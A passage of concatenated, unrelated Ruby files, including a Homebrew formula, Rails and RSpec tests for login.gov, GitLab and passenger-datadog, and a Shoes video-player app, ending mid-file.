class Dcled < Formula desc "Linux driver for dream cheeky USB message board" homepage "https://www.jeffrika.com/~malakai/dcled/index.html" url "https://www.jeffrika.com/~malakai/dcled/dcled-2.2.tgz" sha256 "0da78c04e1aa42d16fa3df985cf54b0fbadf2d8ff338b9bf59bfe103c2a959c6" bottle do cellar :any sha256 "5c36acee3c790871237cb7a3400c6fe4e37daa90258c10b89043ac2aad3a6dc4" => :big_sur sha256 "83a87a0f780dc73c21151690f3b1d0654d33e2baad358122be9d24a0610cea64" => :catalina sha256 "4b94dd5ba218e3bdb0a10767d0ae62205495130baa839db4be4ab29d6561e5e2" => :mojave sha256 "91cf7fa30d905efaf7499f0667c65e25ddb69d82be3f52b93d1df6a400fd7141" => :high_sierra sha256 "bfc1532d76b4d37c706d065bc98feb5a3aeff20751a713d7b7efb08c0976fe9e" => :sierra sha256 "53d07c9548eaeba12645e944ce92c27a02667758176815220dc4ee2a8945c661" => :el_capitan sha256 "2ead7c4eb3c170690890c294936a2d3fc39def2fc332ce4c1da6d17cc8f91b50" => :yosemite sha256 "47a0b2e1eba58932936c25726d631d19f0f2a0a7b8872aff9e1d3a83b4e3cfc9" => :mavericks sha256 "f38a543b5462687bb4a85af64c955326f5aaa0d635186d585b1b93ed01d1297c" => :x86_64_linux end depends_on "libhid" depends_on "libusb" def install system "make", "CC=#{ENV.cc}", "LIBUSB_CFLAGS=-I#{Formula["libusb"].opt_include}/libusb-1.0" system "make", "install", "FONTDIR=#{share}/#{name}", "INSTALLDIR=#{bin}" end test do system "#{bin}/dcled", "--help" end end
# Be sure to restart your server when you modify this file. Shoeshop::Application.config.session_store :cookie_store, key: '_Shoeshop_session'
component "rubygem-aws-sdk-ec2" do |pkg, settings, platform| pkg.version "1.266.0" pkg.md5sum "34b730c219852e2e20a0388fcf7615ba" instance_eval File.read('configs/components/_base-rubygem.rb') end
# Copyright 2015 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require 'google/apis/iam_v1/service.rb' require 'google/apis/iam_v1/classes.rb' require 'google/apis/iam_v1/representations.rb' module Google module Apis # Google Identity and Access Management (IAM) API # # Manages identity and access control for Google Cloud Platform resources, # including the creation of service accounts, which you can use to authenticate # to Google and make API calls. # # @see https://cloud.google.com/iam/ module IamV1 VERSION = 'V1' REVISION = '20180330' # View and manage your data across Google Cloud Platform services AUTH_CLOUD_PLATFORM = 'https://www.googleapis.com/auth/cloud-platform' end end end
require 'test_helper' class UsersSignupTest < ActionDispatch::IntegrationTest def setup ActionMailer::Base.deliveries.clear end test "invalid signup information" do get signup_path assert_no_difference 'User.count' do post users_path, params: { user: { name: "", email: "user@invalid", password: "foo", password_confirmation: "bar" } } end assert_template 'users/new' end test "valid signup information with account activation" do get signup_path assert_difference 'User.count', 1 do post users_path, params: { user: { name: "Example User", email: "user@example.com", password: "password", password_confirmation: "password" } } end assert_equal 1, ActionMailer::Base.deliveries.size user = assigns(:user) assert_not user.activated? # 有効化していない状態でログインしてみる log_in_as(user) assert_not is_logged_in? # 有効化トークンが不正な場合 get edit_account_activation_path("invalid token", email: user.email) assert_not is_logged_in? # トークンは正しいがメールアドレスが無効な場合 get edit_account_activation_path(user.activation_token, email: 'wrong') assert_not is_logged_in? # 有効化トークンが正しい場合 get edit_account_activation_path(user.activation_token, email: user.email) assert user.reload.activated? follow_redirect! assert_template 'users/show' assert is_logged_in? end end
require 'rails_helper' describe ServiceProviderUpdater do include SamlAuthHelper let(:fake_dashboard_url) { 'http://dashboard.example.org' } let(:dashboard_sp_issuer) { 'some-dashboard-service-provider' } let(:inactive_dashboard_sp_issuer) { 'old-dashboard-service-provider' } let(:openid_connect_issuer) { 'sp:test:foo:bar' } let(:openid_connect_redirect_uris) { %w[http://localhost:1234 my-app://result] } let(:agency_1) { create(:agency) } let(:agency_2) { create(:agency) } let(:agency_3) { create(:agency) } let(:friendly_sp) do { id: 'big number', created_at: '2010-01-01 00:00:00'.to_datetime, updated_at: '2010-01-01 00:00:00'.to_datetime, issuer: dashboard_sp_issuer, agency_id: agency_1.id, friendly_name: 'a friendly service provider', description: 'user friendly login.gov dashboard', acs_url: 'http://sp.example.org/saml/login', assertion_consumer_logout_service_url: 'http://sp.example.org/saml/logout', block_encryption: 'aes256-cbc', certs: [saml_test_sp_cert], active: true, native: true, approved: true, help_text: { sign_in: { en: '<b>A new different sign-in help text</b>' }, sign_up: { en: '<b>A new different help text</b>' }, forgot_password: { en: '<b>A new different forgot password help text</b>' }, }, } end let(:old_sp) do { id: 'small number', updated_at: '2010-01-01 00:00:00', issuer: inactive_dashboard_sp_issuer, agency_id: agency_2.id, friendly_name: 'an old, stale service provider', description: 'forget about me', acs_url: 'http://oldsp.example.org/saml/login', assertion_consumer_logout_service_url: 'http://oldsp.example.org/saml/logout', block_encryption: 'aes256-cbc', certs: [saml_test_sp_cert], active: false, } end let(:nasty_sp) do { issuer: 'http://localhost:3000', friendly_name: 'trying to override a test SP', agency_id: agency_3.id, acs_url: 'http://nasty-override.example.org/saml/login', active: true, } end let(:openid_connect_sp) do { issuer: openid_connect_issuer, friendly_name: 'a service provider', agency_id: agency_1.id, redirect_uris: openid_connect_redirect_uris, active: true, certs: [ saml_test_sp_cert, File.read(Rails.root.join('certs', 'sp', 'saml_test_sp2.crt')), ], } end let(:dashboard_service_providers) { [friendly_sp, old_sp, nasty_sp, openid_connect_sp] } describe '#run' do before do allow(IdentityConfig.store).to receive(:dashboard_url).and_return(fake_dashboard_url) end context 'dashboard is available' do before do stub_request(:get, fake_dashboard_url).to_return( status: 200, body: dashboard_service_providers.to_json, ) end after do ServiceProvider.from_issuer(dashboard_sp_issuer).try(:destroy) ServiceProvider.from_issuer(inactive_dashboard_sp_issuer).try(:destroy) end it 'creates new dashboard-provided Service Providers' do subject.run sp = ServiceProvider.from_issuer(dashboard_sp_issuer) expect(sp.agency).to eq agency_1 expect(sp.ssl_certs.first).to be_a OpenSSL::X509::Certificate expect(sp.active?).to eq true expect(sp.id).to_not eq 0 expect(sp.updated_at).to_not eq friendly_sp[:updated_at] expect(sp.created_at).to_not eq friendly_sp[:created_at] expect(sp.native).to eq false expect(sp.approved).to eq true expect(sp.help_text['sign_in']).to eq friendly_sp[:help_text][:sign_in]. stringify_keys expect(sp.help_text['sign_up']).to eq friendly_sp[:help_text][:sign_up]. stringify_keys expect(sp.help_text['forgot_password']).to eq friendly_sp[:help_text][:forgot_password]. stringify_keys end it 'updates existing dashboard-provided Service Providers' do sp = create(:service_provider, issuer: dashboard_sp_issuer) old_id = sp.id subject.run sp = ServiceProvider.from_issuer(dashboard_sp_issuer) expect(sp.agency).to eq agency_1 expect(sp.ssl_certs.first).to be_a OpenSSL::X509::Certificate expect(sp.active?).to eq true expect(sp.id).to eq old_id expect(sp.updated_at).to_not eq friendly_sp[:updated_at] expect(sp.created_at).to_not eq friendly_sp[:created_at] expect(sp.native).to eq false expect(sp.approved).to eq true expect(sp.help_text['sign_in']).to eq friendly_sp[:help_text][:sign_in]. stringify_keys expect(sp.help_text['sign_up']).to eq friendly_sp[:help_text][:sign_up]. stringify_keys expect(sp.help_text['forgot_password']).to eq friendly_sp[:help_text][:forgot_password]. stringify_keys end it 'removes inactive Service Providers' do expect(ServiceProvider.from_issuer(inactive_dashboard_sp_issuer)). to be_a NullServiceProvider subject.run sp = ServiceProvider.from_issuer(inactive_dashboard_sp_issuer) expect(sp).to be_a NullServiceProvider end it 'ignores attempts to alter native Service Providers' do subject.run sp = ServiceProvider.from_issuer('http://localhost:3000') expect(sp.agency).to_not eq 'trying to override a test SP' end it 'updates redirect_uris' do subject.run sp = ServiceProvider.from_issuer(openid_connect_issuer) expect(sp.redirect_uris).to eq(openid_connect_redirect_uris) end it 'updates certs (plural)' do expect { subject.run }. to(change { ServiceProvider.from_issuer(openid_connect_issuer).ssl_certs.size }.to(2)) end end context 'dashboard is not available' do it 'logs error and does not affect registry' do allow(Rails.logger).to receive(:error) before_count = ServiceProvider.count stub_request(:get, fake_dashboard_url).to_return(status: 500) subject.run expect(Rails.logger).to have_received(:error). with("Failed to parse response from #{fake_dashboard_url}: ") expect(ServiceProvider.count).to eq before_count end end context 'a non-native service provider is invalid' do let(:dashboard_service_providers) do [ { id: 'big number', created_at: '2010-01-01 00:00:00'.to_datetime, updated_at: '2010-01-01 00:00:00'.to_datetime, issuer: dashboard_sp_issuer, agency_id: agency_1.id, friendly_name: 'a friendly service provider', description: 'user friendly login.gov dashboard', acs_url: 'http://sp.example.org/saml/login', assertion_consumer_logout_service_url: 'http://sp.example.org/saml/logout', block_encryption: 'aes256-cbc', certs: [saml_test_sp_cert], active: true, native: false, approved: true, redirect_uris: [''], }, ] end it 'raises an error' do stub_request(:get, fake_dashboard_url).to_return( status: 200, body: dashboard_service_providers.to_json, ) expect { subject.run }.to raise_error(ActiveRecord::RecordInvalid) end end context 'dashboard has the old singular cert attribute' do let(:dashboard_service_providers) do [ { issuer: 'aaaaaa', friendly_name: 'a service provider', agency_id: agency_1.id, redirect_uris: openid_connect_redirect_uris, active: true, cert: 'aaaa', }, ] end it 'ignores the old column' do stub_request(:get, fake_dashboard_url).to_return( status: 200, body: dashboard_service_providers.to_json, ) expect { subject.run }.to_not raise_error end end context 'GET request to dashboard raises an error' do it 'logs error and does not affect registry' do allow(Rails.logger).to receive(:error) before_count = ServiceProvider.count stub_request(:get, fake_dashboard_url).and_raise(SocketError) subject.run expect(Rails.logger).to have_received(:error). with("Failed to contact #{fake_dashboard_url}") expect(ServiceProvider.count).to eq before_count end end end end
Shoes.app( :title => 'Shoe_vie v.0.0.1', :width => 450, :height => 600, :resizable => true, :margin => 20 ) do background "#343".."#eee" stroke rgb(0.5, 0.5, 0.7) fill rgb(1.0, 1.0, 0.9) @vid = nil @downloading = false stack(:margin => 10) do @download_stack = stack(:stroke => black, :strokewidth => 5)do @rect_download_stack = rect(0, 0, 430, 250, 10) @rect_download_stack.style(:stroke => black, :strokewidth => 5) stack do @url_movie_flow = flow(:top => 5, :left => 15) do @rect = rect(0, 0, 400, 20, 10) @url_para = para "Url:\t" @url_para.style(:left => 30) @url_movie = edit_line :width => 350, :height => 20, :top => 5 @rect.height = @url_movie.style[:height] + 10 #@url_movie_flow .style(:left => 5, :top => 5) end @name_to_save_flow = flow(:left => 30) do @rect = rect(0, 0, 400, 20, 10) @name_para = para "Name to save: " @name_para.style( :left => 30) # TODO - create a dialog for movie finding # until now this widget serve to find a local movie @file_name_save = edit_line :width => 255, :height => 20, :top => 5 @rect.height = @file_name_save.style[:height] + 10 @rect.left = 15 #@name_to_save_flow. style(:left => 20) end @start_donwnload_button_flow = flow do @button_start_download = button "Start download" @button_start_download .style(:width => 350, :left => 35) @button_start_download.click { @downloading = true;@para.text = "@downloading: ",@downloading;hide_download_stack;start_download_movie} end @stop_donwnload_button_flow = flow do @button_stop_download = button "Cancel download" @button_stop_download .style(:width => 350, :left => 35) @button_stop_download.click { @downloading = false;@para.text = "@downloading: ",@downloading;hide_download_stack;stop_download_movie} #@button_stop_download.click { @downloading = false;@para.text = "@downloading: ",@downloading;(@stop_donwnload_button_flow.style(:hidden => true);@start_donwnload_button_flow.style(:hidden => false));stop_download_movie} end @status_download_stack = stack do flow do @status_head = para "Status: " @status = para end flow do @rect = rect(0, 0, 400, 20, 10) @progress_download = para "Progress\t" @progress_download.left = 20 @p_download = progress :width => 200, :height => 20, :top => 5 @rect.left = @p_download.left @rect.top = @p_download.top @rect.height = @p_download.style[:height] + 10 end end end @status_download_flow = flow do @rect = rect(15, 5, 400, 30, 10) @rect.style(:stroke => red, :strokewidth => 5) @status_download_para = para "Downloads Status\t\t", #link("hide") { @status_download_stack.hide if @downloading == false; @downloading = !@downloading;@para.text = @downloading }, ", ", #link("show") { @status_download_stack.show if @downloading == true; @downloading = !@downloading;@para.text = @downloading } #link("hide") { @downloading = !@downloading;@para.text = @downloading; hide_download_stack }, ", ", link("hide") { @status_download_stack.hide }, ", ", #link("show") { @downloading = !@downloading;@para.text = @downloading; hide_download_stack } link("show") { @status_download_stack.show}, " or ", link("toggle") { @status_download_stack.toggle} @status_download_para.style(:left => 30) end end @downloads_flow = flow do @rect = rect(15, 5, 400, 30, 10) @rect.style(:stroke => red, :strokewidth => 5) @downloads_para = para "Downloads\t\t\t\t", link("hide") { @download_stack.hide }, ", ", link("show") { @download_stack.show }, " or ", link("toggle") { @download_stack.toggle} @downloads_para.style(:left => 30) end @controls_all_stack = stack do @rect = rect(0, 70, 430, 100, 10) @rect.style(:stroke => yellow, :strokewidth => 5) @time = para stack do flow(:top => 25, :left => 15) do @rect = rect(10, -50, 400, 30, 10) @rect.style(:stroke => black, :strokewidth => 5) @progress_time = para "Time progress\t\t" @progress_time.left = 30 @p_time = progress :width => 200, :height => 20, :top => 5 @rect.left = @p_time.left @rect.top = @p_time.top @rect.height = @p_time.style[:height] + 10 end @time_ellapsed = animate do |i| @time.text = "Time ellapsed: ", @vid.time / 1000 < 10 ? "0" + (@vid.time / 1000).to_s : @vid.time / 1000, " seconds" @p_time.fraction = (@vid.position) end @controls_stack = stack do @rect = rect(15, 0, 400, 30, 10) @rect.style(:stroke => red, :strokewidth => 5) @controls = para "Controls: ", #link("play") { @vid = video @file_name_to_save if !@file_name_to_save.nil?; @vid.play; @time_ellapsed }, ", ", #link("play") { @vid.play; @time_ellapsed ; @vid = video @file_name_save.text}, ", ", #link("play") { @vid = video 'movie.flv'}, ", ", link("play") { play_movie}, ", ", link("pause") { @vid.pause }, ", ", link("stop") { @vid.stop }, ", ", link("hide") { @vid.hide }, ", ", link("show") { @vid.show }, ", ", link("+5 sec") { @vid.time += 5000 if (@vid.time < @vid.length - 6000) }, ", ", link("-5 sec") { @vid.time -= 5000 if (@vid.time > 6000) } @controls.left = 30 #@rect.left = @controls.left @rect.top = @controls.top end end end end def start_download_movie @default_url = "http://whytheluckystiff.net/o..e/adventure_time.flv" @url_movie.text == '' ? @url = @default_url : @url = @url_movie.text @file_name_save.text == '' ? @file_name_to_save = 'movie.flv' : @file_name_to_save = @file_name_save.text @status.text = "Fetching #{@file_name_to_save}" @download = download @url, :save => @file_name_to_save, # TODO - search for local movies, list, etc # FIXME - free @vid from :start :start => proc { |dl| @status.text = "Connecting..." ; @vid = video @file_name_to_save if !@file_name_to_save.nil?}, :progress => proc { |dl| @status.text = "#{dl.percent}% complete"; animate(24) {|i| @p_download.fraction = (dl.percent % 100) / 100.0}}, :finish => proc { |dl| @status.text = "Download finished" }, :error => proc { |dl, err| @status.text = "Error: #{err}" } end def stop_download_movie @download .abort #@download.remove end def play_movie @para.text ="Playing" @vid = video @file_name_to_save if !@file_name_to_save.nil? #@vid = video 'movie.flv' @vid.play @time_ellapsed end def hide_download_stack # @status_download_stack style: hidden if @downloading == false @downloading == false ? @status_download_stack.style(:hidden => true) : @status_download_stack.style(:hidden => false)#Ok # @stop_donwnload_button_flow and @start_donwnload_button_flow if @downloading == false @downloading == false ? (@stop_donwnload_button_flow.style(:hidden => true);@start_donwnload_button_flow.style(:hidden => false)) : (@stop_donwnload_button_flow.style(:hidden => false);@start_donwnload_button_flow.style(:hidden => true)) #(@stop_donwnload_button_flow.style(:hidden => true);@start_donwnload_button_flow.style(:hidden => false)) if (@downloading == false) #(@stop_donwnload_button_flow.style(:hidden => false);@start_donwnload_button_flow.style(:hidden => true)) if(@downloading == true) end def initalize hide_download_stack end initalize @para = para #################################################################### end
# frozen_string_literal: true require 'spec_helper' RSpec.describe Projects::MergeRequests::CreationsController do let(:project) { create(:project, :repository) } let(:merge_request) { create(:merge_request_with_diffs, target_project: project, source_project: project) } let(:user) { project.first_owner } let(:viewer) { user } before do sign_in(viewer) end describe 'GET #new' do render_views context 'default templates' do let(:selected_field) { 'data-selected="Default"' } let(:files) { { '.gitlab/merge_request_templates/Default.md' => '' } } subject do get :new, params: { namespace_id: project.namespace, project_id: project, merge_request: { source_project_id: project.id, source_branch: 'feature', target_project_id: project.id, target_branch: 'master' } } end before do project.repository.create_branch('feature', 'master') end context 'when a template has been set via project settings' do let(:project) { create(:project, :custom_repo, merge_requests_template: 'Content', files: files ) } it 'does not select a default template' do subject expect(response.body).not_to include(selected_field) end end context 'when a template has not been set via project settings' do let(:project) { create(:project, :custom_repo, files: files ) } it 'selects a default template' do subject expect(response.body).to include(selected_field) end end end end describe 'POST #create' do let(:created_merge_request) { assigns(:merge_request) } def create_merge_request(overrides = {}) params = { namespace_id: project.namespace.to_param, project_id: project.to_param, merge_request: { title: 'Test', source_branch: 'feature_conflict', target_branch: 'master', author: user }.merge(overrides) } post :create, params: params end context 'the approvals_before_merge param' do before do project.update!(approvals_before_merge: 2) end context 'when it is less than the one in the target project' do before do create_merge_request(approvals_before_merge: 1) end it 'sets the param to the project value' do expect(created_merge_request.reload.approvals_before_merge).to eq(2) end it 'creates the merge request' do expect(created_merge_request).to be_valid expect(response).to redirect_to(project_merge_request_path(project, created_merge_request)) end end context 'when it is equal to the one in the target project' do before do create_merge_request(approvals_before_merge: 2) end it 'sets the param to the correct value' do expect(created_merge_request.reload.approvals_before_merge).to eq(2) end it 'creates the merge request' do expect(created_merge_request).to be_valid expect(response).to redirect_to(project_merge_request_path(project, created_merge_request)) end end context 'when it is greater than the one in the target project' do before do create_merge_request(approvals_before_merge: 3) end it 'saves the param in the merge request' do expect(created_merge_request.approvals_before_merge).to eq(3) end it 'creates the merge request' do expect(created_merge_request).to be_valid expect(response).to redirect_to(project_merge_request_path(project, created_merge_request)) end end context 'when the target project is a fork of a deleted project' do before do original_project = create(:project) project.update!(forked_from_project: original_project, approvals_before_merge: 4) original_project.update!(pending_delete: true) create_merge_request(approvals_before_merge: 3) end it 'uses the default from the target project' do expect(created_merge_request.reload.approvals_before_merge).to eq(4) end it 'creates the merge request' do expect(created_merge_request).to be_valid expect(response).to redirect_to(project_merge_request_path(project, created_merge_request)) end end end context 'overriding approvers per MR' do let(:new_approver) { create(:user) } before do project.add_developer(new_approver) project.update!(disable_overriding_approvers_per_merge_request: disable_overriding_approvers_per_merge_request) create_merge_request( approval_rules_attributes: [ { name: 'Test', user_ids: [new_approver.id], approvals_required: 1 } ] ) end context 'enabled' do let(:disable_overriding_approvers_per_merge_request) { false } it 'does create approval rules' do approval_rules = created_merge_request.reload.approval_rules expect(approval_rules.count).to eq(1) expect(approval_rules.first.name).to eq('Test') expect(approval_rules.first.user_ids).to eq([new_approver.id]) expect(approval_rules.first.approvals_required).to eq(1) end end context 'disabled' do let(:disable_overriding_approvers_per_merge_request) { true } it 'does not create approval rules' do expect(created_merge_request.reload.approval_rules).to be_empty end end end it 'disables query limiting' do expect(Gitlab::QueryLimiting).to receive(:disable!) create_merge_request end end end
module Layouts class SchoolPresenter < ::ApplicationPresenter def props { school_name: current_school.name, school_logo_path: school_logo_path, school_icon_path: school_icon_path, courses: courses, is_course_author: current_user_is_a_course_author?, has_notifications: notifications? } end private def notifications? return false if current_user.blank? current_user.notifications.unread.any? end def school_logo_path if current_school.logo_on_light_bg.attached? view.rails_public_blob_url(current_school.logo_variant('thumb')) else view.image_path('shared/pupilfirst-logo.svg') end end def school_icon_path if current_school.icon.attached? view.rails_public_blob_url(current_school.icon_variant('thumb')) else '/favicon.png' end end def courses if current_user.school_admin.present? current_school.courses.live.as_json(only: %i[name id ends_at]) elsif current_user.course_authors.any? current_school .courses .live .where(id: current_user.course_authors.pluck(:course_id)) .as_json(only: %i[name id ends_at]) end end def current_user_is_a_course_author? current_user.course_authors.exists?(course: current_school.courses) && current_user.school_admin.blank? end end end
# frozen_string_literal: true require 'spec_helper' describe PassengerDatadog do let(:Statsd) { double(Datadog::Statsd) } let(:statsd) { instance_double(Datadog::Statsd) } subject { described_class.new } context 'passenger not running' do before do allow(subject).to receive(:`).and_return('') end it 'does not send stats to datadog' do expect(Datadog::Statsd).not_to receive(:new) subject.run end end context 'passenger 4' do before do allow(subject).to receive(:`).and_return(File.read('spec/fixtures/passenger_4_status.xml')) end let(:passenger_status) do [['passenger.pool.used', '5'], ['passenger.pool.max', '20'], ['passenger.request_queue', '0'], ['passenger.enabled_process_count', '5'], ['passenger.disabling_process_count', '0'], ['passenger.disabled_process_count', '0'], ['passenger.processed', '149', { tags: ['passenger-process:0'] }], ['passenger.sessions', '0', { tags: ['passenger-process:0'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:0'] }], ['passenger.cpu', '0', { tags: ['passenger-process:0'] }], ['passenger.rss', '554312', { tags: ['passenger-process:0'] }], ['passenger.private_dirty', '548660', { tags: ['passenger-process:0'] }], ['passenger.pss', '549560', { tags: ['passenger-process:0'] }], ['passenger.swap', '0', { tags: ['passenger-process:0'] }], ['passenger.real_memory', '548660', { tags: ['passenger-process:0'] }], ['passenger.vmsize', '952668', { tags: ['passenger-process:0'] }], ['passenger.processed', '273', { tags: ['passenger-process:1'] }], ['passenger.sessions', '0', { tags: ['passenger-process:1'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:1'] }], ['passenger.cpu', '0', { tags: ['passenger-process:1'] }], ['passenger.rss', '547088', { tags: ['passenger-process:1'] }], ['passenger.private_dirty', '541420', { tags: ['passenger-process:1'] }], ['passenger.pss', '542326', { tags: ['passenger-process:1'] }], ['passenger.swap', '0', { tags: ['passenger-process:1'] }], ['passenger.real_memory', '541420', { tags: ['passenger-process:1'] }], ['passenger.vmsize', '963948', { tags: ['passenger-process:1'] }], ['passenger.processed', '139', { tags: ['passenger-process:2'] }], ['passenger.sessions', '0', { tags: ['passenger-process:2'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:2'] }], ['passenger.cpu', '0', { tags: ['passenger-process:2'] }], ['passenger.rss', '533704', { tags: ['passenger-process:2'] }], ['passenger.private_dirty', '258196', { tags: ['passenger-process:2'] }], ['passenger.pss', '394044', { tags: ['passenger-process:2'] }], ['passenger.swap', '0', { tags: ['passenger-process:2'] }], ['passenger.real_memory', '258196', { tags: ['passenger-process:2'] }], ['passenger.vmsize', '887132', { tags: ['passenger-process:2'] }], ['passenger.processed', '135', { tags: ['passenger-process:3'] }], ['passenger.sessions', '0', { tags: ['passenger-process:3'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:3'] }], ['passenger.cpu', '1', { tags: ['passenger-process:3'] }], ['passenger.rss', '559972', { tags: ['passenger-process:3'] }], ['passenger.private_dirty', '284396', { tags: ['passenger-process:3'] }], ['passenger.pss', '420259', { tags: ['passenger-process:3'] }], ['passenger.swap', '0', { tags: ['passenger-process:3'] }], ['passenger.real_memory', '284396', { tags: ['passenger-process:3'] }], ['passenger.vmsize', '915564', { tags: ['passenger-process:3'] }], ['passenger.processed', '236', { tags: ['passenger-process:4'] }], ['passenger.sessions', '0', { tags: ['passenger-process:4'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:4'] }], ['passenger.cpu', '0', { tags: ['passenger-process:4'] }], ['passenger.rss', '548696', { tags: ['passenger-process:4'] }], ['passenger.private_dirty', '543068', { tags: ['passenger-process:4'] }], ['passenger.pss', '543957', { tags: ['passenger-process:4'] }], ['passenger.swap', '0', { tags: ['passenger-process:4'] }], ['passenger.real_memory', '543068', { tags: ['passenger-process:4'] }], ['passenger.vmsize', '964668', { tags: ['passenger-process:4'] }]] end it 'sends stats to datadog' do allow(Datadog::Statsd).to receive(:new).and_return(statsd) allow(statsd).to receive(:batch).and_yield(statsd) expect(statsd).not_to receive(:gauge).with('passenger.busyness', anything) expect(statsd).not_to receive(:gauge).with('passenger.capacity_used', anything) expect(statsd).not_to receive(:gauge).with('passenger.processes_being_spawned', anything) passenger_status.each do |key, *value| expect(statsd).to receive(:gauge).with(key, *value) end subject.run end end context 'passenger 5' do before do allow(subject).to receive(:`).and_return(File.read('spec/fixtures/passenger_5_status.xml')) end let(:passenger_status) do [['passenger.pool.used', '2'], ['passenger.pool.max', '5'], ['passenger.request_queue', '999'], ['passenger.capacity_used', '2'], ['passenger.get_wait_list_size', '111'], ['passenger.disable_wait_list_size', '0'], ['passenger.processes_being_spawned', '0'], ['passenger.enabled_process_count', '2'], ['passenger.disabling_process_count', '0'], ['passenger.disabled_process_count', '0'], ['passenger.processed', '2', { tags: ['passenger-process:0'] }], ['passenger.sessions', '0', { tags: ['passenger-process:0'] }], ['passenger.busyness', '0', { tags: ['passenger-process:0'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:0'] }], ['passenger.cpu', '0', { tags: ['passenger-process:0'] }], ['passenger.rss', '409596', { tags: ['passenger-process:0'] }], ['passenger.private_dirty', '126456', { tags: ['passenger-process:0'] }], ['passenger.pss', '267231', { tags: ['passenger-process:0'] }], ['passenger.swap', '0', { tags: ['passenger-process:0'] }], ['passenger.real_memory', '126456', { tags: ['passenger-process:0'] }], ['passenger.vmsize', '812632', { tags: ['passenger-process:0'] }], ['passenger.processed', '3', { tags: ['passenger-process:1'] }], ['passenger.sessions', '0', { tags: ['passenger-process:1'] }], ['passenger.busyness', '0', { tags: ['passenger-process:1'] }], ['passenger.concurrency', '1', { tags: ['passenger-process:1'] }], ['passenger.cpu', '0', { tags: ['passenger-process:1'] }], ['passenger.rss', '407972', { tags: ['passenger-process:1'] }], ['passenger.private_dirty', '124832', { tags: ['passenger-process:1'] }], ['passenger.pss', '265607', { tags: ['passenger-process:1'] }], ['passenger.swap', '0', { tags: ['passenger-process:1'] }], ['passenger.real_memory', '124832', { tags: ['passenger-process:1'] }], ['passenger.vmsize', '812536', { tags: ['passenger-process:1'] }]] end it 'sends stats to datadog' do allow(Datadog::Statsd).to receive(:new).and_return(statsd) allow(statsd).to receive(:batch).and_yield(statsd) passenger_status.each do |key, *value| expect(statsd).to receive(:gauge).with(key, *value) end subject.run end end context 'passenger 5 with multiple supergroups' do before do allow(subject).to receive(:`).and_return(File.read('spec/fixtures/passenger_5_status_multiple_supergroups.xml')) end let(:passenger_status) do [['passenger.pool.used', '2'], ['passenger.pool.max', '5'], ['passenger.request_queue', '999'], ['passenger.passenger_datadog_development.capacity_used', '2'], ['passenger.passenger_datadog_development.get_wait_list_size', '111'], ['passenger.passenger_datadog_development.disable_wait_list_size', '0'], ['passenger.passenger_datadog_development.processes_being_spawned', '0'], ['passenger.passenger_datadog_development.enabled_process_count', '2'], ['passenger.passenger_datadog_development.disabling_process_count', '0'], ['passenger.passenger_datadog_development.disabled_process_count', '0'], ['passenger.passenger_datadog_development.processed', '2', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.sessions', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.busyness', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.concurrency', '1', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.cpu', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.rss', '409596', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.private_dirty', '126456', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.pss', '267231', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.swap', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.real_memory', '126456', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.vmsize', '812632', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_development.processed', '3', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.sessions', '0', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.busyness', '0', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.concurrency', '1', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.cpu', '0', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.rss', '407972', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.private_dirty', '124832', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.pss', '265607', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.swap', '0', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.real_memory', '124832', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_development.vmsize', '812536', { tags: ['passenger-process:1'] }], ['passenger.passenger_datadog_production.capacity_used', '2'], ['passenger.passenger_datadog_production.get_wait_list_size', '111'], ['passenger.passenger_datadog_production.disable_wait_list_size', '0'], ['passenger.passenger_datadog_production.processes_being_spawned', '0'], ['passenger.passenger_datadog_production.enabled_process_count', '2'], ['passenger.passenger_datadog_production.disabling_process_count', '0'], ['passenger.passenger_datadog_production.disabled_process_count', '0'], ['passenger.passenger_datadog_production.processed', '2', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.sessions', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.busyness', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.concurrency', '1', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.cpu', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.rss', '409596', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.private_dirty', '126456', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.pss', '267231', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.swap', '0', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.real_memory', '126456', { tags: ['passenger-process:0'] }], ['passenger.passenger_datadog_production.vmsize', '812632', { tags: ['passenger-process:0'] }]] end it 'sends stats to datadog' do allow(Datadog::Statsd).to receive(:new).and_return(statsd) allow(statsd).to 